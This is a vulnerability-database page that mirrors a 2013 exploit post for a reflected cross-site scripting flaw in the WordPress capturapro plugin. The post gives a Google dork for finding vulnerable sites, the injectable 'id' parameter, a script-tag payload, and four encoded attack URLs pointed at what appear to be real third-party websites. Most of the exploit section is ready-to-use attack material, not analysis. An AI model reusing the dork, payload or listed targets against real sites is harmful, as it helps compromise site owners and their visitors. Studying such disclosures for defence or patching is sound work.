Wordpress capturapro Plugin Cross site scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044107 漏洞类型
发布时间 2013-11-22 更新时间 2013-11-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013110159
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#######################################################################
# Exploit Title : Wordpress capturapro Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:wp-content/plugins/capturapro
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/11/22
#
#############################################
# Exploit : Cross site scripting
#
# Location1:
[Target]/wp-content/plugins/capturapro/lp/index.php?id=[xss]
#
#
# Script For Test : "/><script>alert(1);</script>
#
##########################################
# Demo
http://mensajesublXiminalextremo.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E

http://marinaybarXenlared.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E

http://formulatuXexito.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E

http://wpalenciXa.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E

##############

Milad Hacking

We Love Mohammad

##############